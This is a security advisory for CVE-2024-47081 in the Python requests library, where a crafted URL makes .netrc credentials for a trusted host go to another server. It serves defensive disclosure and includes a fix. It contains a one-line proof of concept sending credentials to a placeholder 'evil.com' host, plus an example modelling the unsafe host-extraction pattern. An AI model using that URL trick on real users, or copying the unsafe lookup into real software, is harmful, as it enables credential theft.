Insertion of Sensitive Information Into Sent Data Affecting requests package, versions [0,]


Severity: medium (CVSS assessment by Snyk's Security Team)

Threat Intelligence

Exploit Maturity: Proof of Concept

  • Snyk ID: SNYK-PYTHON-REQUESTS-10305723
  • Published: 6 Jun 2025
  • Disclosed: 4 Jun 2025
  • Credit: Juho Forsén

Introduced: 4 Jun 2025

CVE-2024-47081
CWE-201

How to fix?

At the time this advisory was published, a fix had been merged into the master branch but not yet released; it was subsequently published in requests 2.32.4.

Overview

Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data due to incorrect URL processing during the .netrc credential lookup: the host name used to select a .netrc entry is derived from the URL differently from the host the request is actually sent to. An attacker can therefore craft a URL that, when processed by the library, causes it to look up the victim's .netrc credentials for a trusted host and send them to a server the attacker controls.

Note:

This is only exploitable if the victim's .netrc file contains an entry for the host name that the attacker places in the userinfo part of the crafted URL (e.g., example.com in http://example.com:@evil.com/, where the request is actually sent to evil.com). It also requires that requests consults .netrc at all, which it does only when no explicit auth is supplied and the session's trust_env is True (the default).

PoC

import requests
requests.get('http://example.com:@evil.com/')  # .netrc credentials for example.com are sent to evil.com
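The following is an added, offline example that is not code from the requests project or from this advisory. It models the bug class behind the PoC: deriving the .netrc lookup key by splitting the URL's netloc on ':' (which still contains the userinfo "user:pass@") versus using urlparse().hostname, which excludes userinfo and port. The helper names, the sample .netrc contents and the fake credential are all constructed for the illustration; the unsafe helper is a model of the pattern, not a copy of requests' internal function.

```python
"""Host-confusion in a .netrc lookup, in the style of CVE-2024-47081.

Added example, not code from the requests project. The two host-extraction
helpers below model the unsafe and safe ways of deriving a .netrc lookup key
from a URL; they illustrate the bug class rather than reproduce requests'
internals.
"""
import os
import tempfile
from netrc import netrc
from urllib.parse import urlparse

# Constructed sample .netrc content; the credential is fake.
SAMPLE_NETRC = """\
machine example.com
  login alice
  password s3cret
"""

CRAFTED_URL = "http://example.com:@evil.com/"   # attacker-supplied URL
NORMAL_URL = "http://example.com:8443/api"     # ordinary URL with a port


def host_by_netloc_split(url):
    """Unsafe: strip a port by splitting netloc on ':'.

    netloc still carries the userinfo ("user:pass@"), so for
    'example.com:@evil.com' the text before the first ':' is the
    attacker-chosen username 'example.com', not the real host.
    """
    return urlparse(url).netloc.split(":")[0]


def host_by_hostname(url):
    """Safe: urlparse().hostname excludes both userinfo and port."""
    return urlparse(url).hostname


def actual_destination(url):
    """(host, port) the TCP connection is really opened to."""
    parts = urlparse(url)
    default_port = 443 if parts.scheme == "https" else 80
    return parts.hostname, parts.port or default_port


def netrc_auth_for(url, netrc_text, host_fn):
    """Return the (login, password) a .netrc lookup keyed on host_fn(url)
    would attach, or None when no machine entry matches.

    The stdlib netrc module needs a file, so the constructed text is
    written to a temporary file for the duration of the lookup.
    """
    fd, path = tempfile.mkstemp()
    try:
        with os.fdopen(fd, "w") as fh:
            fh.write(netrc_text)
        entry = netrc(path).authenticators(host_fn(url))
    finally:
        os.unlink(path)
    if entry is None:
        return None
    login, _account, password = entry
    return login, password


def compare(url, netrc_text=SAMPLE_NETRC):
    """Summarise, for one URL, where the request goes and what each
    extraction strategy would look up and send."""
    return {
        "destination": actual_destination(url),
        "netloc_split": {
            "lookup_host": host_by_netloc_split(url),
            "auth_sent": netrc_auth_for(url, netrc_text, host_by_netloc_split),
        },
        "hostname": {
            "lookup_host": host_by_hostname(url),
            "auth_sent": netrc_auth_for(url, netrc_text, host_by_hostname),
        },
    }


if __name__ == "__main__":
    for url in (CRAFTED_URL, NORMAL_URL):
        report = compare(url)
        print(url)
        print("  connects to      :", report["destination"])
        print("  netloc.split(':'):", report["netloc_split"])
        print("  .hostname        :", report["hostname"])
```

For the crafted URL the netloc-split strategy resolves the lookup host to example.com and would send alice's credential to evil.com on port 80, while the hostname strategy resolves evil.com, finds no entry and sends nothing; for the ordinary URL with a port both strategies agree. Until an affected deployment can be upgraded, passing an explicit auth= argument or setting Session.trust_env = False prevents requests from consulting .netrc at all.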
